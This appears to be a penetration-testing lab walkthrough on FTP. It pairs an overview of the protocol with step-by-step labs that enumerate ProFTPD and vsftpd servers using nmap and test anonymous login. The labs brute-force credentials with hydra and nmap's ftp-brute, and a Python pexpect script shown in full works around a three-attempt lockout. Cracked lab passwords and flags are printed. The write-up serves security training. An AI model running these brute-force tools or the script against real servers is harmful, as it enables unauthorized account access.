FTP stands for File Transfer Protocol. It is a standard network protocol used for transferring files between a client computer and a server on a computer network. FTP is widely used for sharing files over the internet and within local networks. It provides a way to upload, download, and manage files on a remote server.
Here are some key features and aspects of FTP:
- Two-Part System: FTP involves two main components: the FTP client and the FTP server. The client is the software used by a user to connect to and interact with the server.
- Authentication: FTP servers typically require authentication, which involves providing a username and password to access the server. However, the standard FTP protocol sends login credentials in plain text, making it less secure. For enhanced security, protocols like FTPS (FTP Secure) and SFTP (SSH File Transfer Protocol) use encryption to protect sensitive data.
- Commands and Responses: FTP communication follows a command-response model. The client sends commands to the server to request specific actions, such as listing directories or uploading files. The server responds with messages indicating the success or failure of the requested actions.
- Modes of Transfer: FTP supports two modes of data transfer: active mode and passive mode. In active mode, the server initiates the data connection to the client, while in passive mode, the client initiates the data connection to the server.
- Directory Listing: FTP allows clients to view the contents of directories on the server, making it easy to navigate and select files for transfer.
- Binary and ASCII Mode: FTP provides two transfer modes: binary and ASCII. Binary mode is used for transferring non-text files (e.g., images, executables), while ASCII mode is used for text-based files to ensure proper line-ending conversions.
- Anonymous FTP: Some FTP servers support anonymous logins, allowing users to access public directories without requiring a username and password. This is often used for sharing public files, such as software updates or documentation.
- Extensions and Features: FTP has been extended over the years with various features like resuming interrupted transfers, managing file permissions, and creating directories.
- Limitations and Security Concerns: Traditional FTP lacks encryption, which can expose sensitive data and credentials to potential eavesdropping. This has led to the development of more secure alternatives like FTPS and SFTP.
(File Transfer Protocol) - a client-server protocol used to transfer files between a network using TCP/UDP connections.
It requires a command channel and a data channel.
Default FTP port is 21, opened when FTP is activated for sharing data.
sudo nmap -p21 -sV -sC -O <TARGET_IP>
- Target IP:
192.217.238.3- Enumeration of ProFTP server
ip -br -c a
eth1@if170718 UP 192.217.238.2/24- Target IP is
192.217.238.3
nmap 192.217.238.3
21/tcp open ftpnmap -p21 -sV -O 192.217.238.321/tcp open ftp ProFTPD 1.3.5a
[...]
Service Info: OS: Unix📌 FTP server version is
ProFTPD 1.3.5a.
ftp - Linux Man Page
- Try
anonymous:anonymouslogin
ftp 192.217.238.3
# anonymous login failed- Use
hydrawith some users/passwords word lists to check if any credentials work with the ftp server
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.217.238.3 -t 4 ftp[DATA] max 16 tasks per 1 server, overall 16 tasks, 7063 login tries (l:7/p:1009), ~442 tries per task
[DATA] attacking ftp://192.217.238.3:21/
[21][ftp] host: 192.217.238.3 login: sysadmin password: 654321
[21][ftp] host: 192.217.238.3 login: rooty password: qwerty
[21][ftp] host: 192.217.238.3 login: demo password: butterfly
[21][ftp] host: 192.217.238.3 login: auditor password: chocolate
[21][ftp] host: 192.217.238.3 login: anon password: purple
[21][ftp] host: 192.217.238.3 login: administrator password: tweety
[21][ftp] host: 192.217.238.3 login: diag password: tigger
1 of 1 target successfully completed, 7 valid passwords found📌 Found credentials are:
sysadmin:654321rooty:qwertydemo:butterflyauditor:chocolateanon:purpleadministrator:tweetydiag:tigger
- Use nmap ftp-brute script to find the
sysadmin's password
echo "sysadmin" > usersnmap --script ftp-brute --script-args userdb=/root/users -p21 192.217.238.321/tcp open ftp
| ftp-brute:
| Accounts:
| sysadmin:654321 - Valid credentials
|_ Statistics: Performed 23 guesses in 6 seconds, average tps: 3.8- Extract the 7 flags hidden on the server by logging in to the
ftpserver with each found user
ftp 192.217.238.3
ftp> ls
ftp> get secret.txt
ftp> exit
root@attackdefense:~# cat secret.txt Reveal Flag - sysadmin flag is: 🚩
260ca9dd8a4577fc00b7bd5810298076
Reveal Flag - rooty flag is: 🚩
e529a9cea4a728eb9c5828b13b22844c
Reveal Flag - demo flag is: 🚩
d6a6bc0db10694a2d90e3a69648f3a03
Reveal Flag - auditor flag is: 🚩
098f6bcd4621d373cade4e832627b4f6
Reveal Flag - anon flag is: 🚩
1bc29b36f623ba82aaf6724fd3b16718
Reveal Flag - administrator flag is: 🚩
21232f297a57a5a743894a0e4a801fc3
Reveal Flag - diag flag is: 🚩
12a032ce9179c32a6c7ab397b9d871fa
- Target IP:
192.119.169.3- Enumeration of vsftpd server
ip -br -c a
eth1@if170803 UP 192.119.169.2/24- Target IP is
192.119.169.3
nmap 192.119.169.3
21/tcp open ftpnmap -p21 -sV -O 192.119.169.321/tcp open ftp vsftpd 3.0.3📌 FTP server version
vsftpd 3.0.3
- Use nmap ftp-anon script to check
anonymoususer login
nmap --script ftp-anon -p21 192.119.169.321/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 33 Dec 18 2018 flag
|_drwxr-xr-x 2 ftp ftp 4096 Dec 18 2018 pub📌 Anonymous FTP login allowed
ftp 192.119.169.3
# Use anonymous:anonymous to loginName (192.119.169.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp> get flag
ftp> exit
root@attackdefense:~# cat flag Reveal Flag: 🚩
4267bdfbff77d7c2635e4572519a8b9c
🔬 VSFTPD Recon: Dictionary Attack
- Target IP:
192.14.30.3- Dicotionary attack on
vsftpdserver- FTP server terminates the session after 3 attemps
ip -br -c a
eth1@if170888 UP 192.14.30.2/24 - Target IP is
192.14.30.3
nmap 192.14.30.3
21/tcp open ftpnmap -p21 -sV -O 192.14.30.321/tcp open ftp vsftpd 3.0.3echo "billy" > users
nmap --script ftp-brute --script-args userdb=/root/users -p21 192.14.30.321/tcp open ftp
| ftp-brute:
| Accounts:
| billy:carlos - Valid credentials
|_ Statistics: Performed 78 guesses in 55 seconds, average tps: 1.5📌 billy's password is
carlos
- A custom script to attemp the logins is required if automated dictionary attack do not work, since the server terminates the sessions after 3 login attempts.
e.g.python script:
nano billy.pyimport pexpect
import sys
username=sys.argv[2]
password_dict=sys.argv[3]
# Loading the password dictionary and Striping \n
lines = [line.rstrip('\n') for line in open(password_dict)]
itr = 0
# Iterating over dictionary
for password in lines:
child = pexpect.spawn ('ftp '+sys.argv[1])
child.expect ('Name .*: ')
child.sendline (username)
print "Trying with password: ",password
child.expect ('Password:')
child.sendline (password)
i = child.expect (['Login successful', 'Login failed'])
if i==1:
#print('Login failed')
child.kill(0)
elif i==0:
print "Login Successful for ",password
print child.before
breakpython billy.py 192.14.30.3 billy /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtLogin Successful for carlos- Fetch the flag using
billy:carloscredentials
ftp 192.14.30.3
ftp> ls
ftp> get flag
ftp> exit
root@attackdefense:~# cat flagReveal Flag: 🚩
c07c7a9be16f43bb473ed7b604295c0b